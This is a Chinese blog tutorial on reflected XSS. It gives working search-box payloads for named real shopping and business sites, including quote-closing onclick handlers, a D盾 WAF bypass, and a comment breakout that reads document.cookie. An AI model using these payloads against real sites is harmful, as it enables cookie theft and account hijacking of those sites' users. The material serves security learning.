xss漏洞实战--放射性xss漏洞总结

最新推荐文章于 2024-08-03 23:00:16 发布
最新推荐文章于 2024-08-03 23:00:16 发布
阅读量1.3k 收藏 14
点赞数 2
分类专栏: xss 文章标签: web安全 xss漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42109829/article/details/103516937
版权

1. 查找反射型的xss型的漏洞。

放射性xss漏洞一般存在于搜索框哪里,,原理我就不讲了,直接实战啦
**

1.1 用偏僻字符绕waf

我们在找xss漏洞的时候常常会遇到一些waf防护就比如
例: 100招商网
我们输入最常见的poalay

<script>alert(123)</script>

在这里插入图片描述
出现D盾防护。
在这里插入图片描述

这时候就出现了 我们应该知道他u盾是防护了什么,什么这时候我们可以 分别输入

<script>,alert(123) ,</a> 
对waf的过滤情况进行尝试。
尝试到最后, 我们发现,onclick  ,//边框触发 onmouseover  //边框触发 
,confirm(), prompt() 都可以用,

然后我们可以看看我们要怎么构造语句了 。先输入一端乱码然后点击搜索**

在这里插入图片描述
然后在查看原代码
在这里插入图片描述
这里我们看到一个输出点为value = “ 我们输入的数据, 所以这时候我们可以尝试用双引号去闭合他们的语句,再构建我们自己的语句。
所以我们利用之前没被被d盾牌过滤的语句构建一个语句。
例;

 123456789"%2Bοnclick="confirm(8819)
 
 123456789"%2Bοnclick="prompt(88199)
 
 "οnmοuseοver=prompt(54);"      //   边框触发

输入后点击边框,成果弹框
在这里插入图片描述
总结:这里面还有其他很多语句麻烦你们看了之后可以自己动手尝试其他语句搜索框。

1.2 用<!----->注释语句闭合前面的注释。

网站 ;http://www.shopin.net/
1.老样子,先输入个

<script>alert(123)</script>

搜索后没什么反应,然后再查看原代码,搜索123 看看我们输入的那个点前面有<–>注释语句,这时候我们想的应该是如何闭合,
在这里插入图片描述
所以我们可以构建语句:

 <!--> <a href="" onclick="alert(document.cookie)">123456 </a>

进行弹框。
``
在这里插入图片描述

成功爆出cookie:
注:document.cookie用于显示用户的信息。

1.3 普通的测试

http://s.linkshop.com.cn/?key=%E7%94%9F%E9%B2%9C%E7%BB%8F%E8%90%A5&type=0
功能点如下:
直接检测:
payload:123456789" οnclick=“alert(0)” 直接弹窗
在这里插入图片描述
在这里插入图片描述

1.4 普通的测试

目标网站:http://www.dtvipshop.com
反射型XSS漏洞1:
功能点:搜索框
在这里插入图片描述
构建 payload:
123456" onclick = "alert(0)
弹框。.
在这里插入图片描述
总结;暂时就收集了这么多类型的漏洞,找xss的技巧在于多看源码,多动手。然后希望各位小哥哥小姐姐在看到这篇文章后,觉得能了解到东西的麻烦给小弟一个赞,方便提高我以后写文档的信息,也希望你们在评论区说出我文档的不足。

kuxing_admin
关注
专栏目录
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全XSS过滤器。
XSS实战漏洞挖掘
hmysn的博客
05-11 936
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
waf绕过之文件上传绕过xss绕过以及查杀工具
weixin_46248422的博客
07-26 887
一、文件上传绕过: 方法一:等号绕过:在filename后面夹两个== 方法二:换行绕过:在文件后缀名处换行 方法三:填充垃圾字符 方法四五试过没有成功: 方法四:突破0,文件名前缀加[0x09]绕过 方法五:文件名去掉双引号绕过 二、XSS绕过WAF 1、大小写绕过 2、javascript伪协议 3、没有分号 4、Flash 5、HTML5 新标签 audio div等标签都可以绕过waf 6、Fuzz进行测试 7、双层标签绕过 CC防护对应有...
xss漏洞(三,xss进阶利用)
最新发布
2302_80280669的博客
08-03 684
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
xss绕过,payload全集
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
XSS绕过方法总结
I_WORM的博客
01-31 1246
" < > & ' 等字符转为文本型实体编码PHP htmlspecialchars() 函数 | 菜鸟教程 (runoob.com)
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5958
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
xss-labs-master.rar
05-09
总结,"xss-labs-master.rar" 是一个宝贵的XSS学习资源,它不仅涵盖了XSS的基础理论,还提供了实战经验,对于想要深入理解和防范XSS攻击的人来说,是一次难得的训练机会。通过系统地完成这二十个关卡,你将能够更好...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master`是一个深入理解和实践XSS注入的绝佳平台,它涵盖了多种XSS类型和攻击方式,通过实战提升安全测试人员的技能。在解决每个挑战的过程中,参与者不仅可以掌握如何识别和利用XSS漏洞,还能学习如何有效...
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
XSS绕过经验总结
sli_ant的博客
07-06 4852
XSS绕过经验总结 1.概述 做过不少渗透测试,发现系统中有各式各样的拦截XSS的机制,这边分享一下绕过XSS的经验。 刚开始学习XSS时,可能一开始的攻击方式是将payload整理成字典,然后一个个尝试,或者是放到burpsuite中进行爆破,这个是非常直接而且挺有效果的方式,但是如果防御机制是直接将特殊字符进行转义时,可能这个效果就会比较差,因此我这里分享的经验时逐步进行分析的流程。 XSS攻击的流程: 1.观察输入的数据是否在页面有回显 2.判断XSS防御机制 3.构造XSSpayload 4.触发X
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 1628
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
XSS攻击绕过过滤方法大全(转)
热门推荐
mingyqf的博客
04-20 2万+
XSS攻击绕过过滤方法大全(约100种) 虽然说很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS注入。 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录,现在此XSS备忘录将由OWASP维护和完善它。 OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat She
反射性xss实验
qq_42981372的博客
04-24 1126
实验目的: 理解反射性xss的原理,学习反射性xss的实现过程。 实验原理:xss攻击是web攻击中最常见的攻击方法之一,恶意攻击者往web页面里插入恶意html代码,当用户浏览该页时,嵌入其中web里面HTML代码会被执行,从而达到恶意攻击用户的特殊目的。在xss的攻击方式中需要欺骗用户自己去点击链接才能触发xss的称为反射性xss。 实验步骤: 一.简单的反射型xss试验 1.在已经搭建好的实...
XSS绕过与防御总结
2301_77512689的博客
04-27 235
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值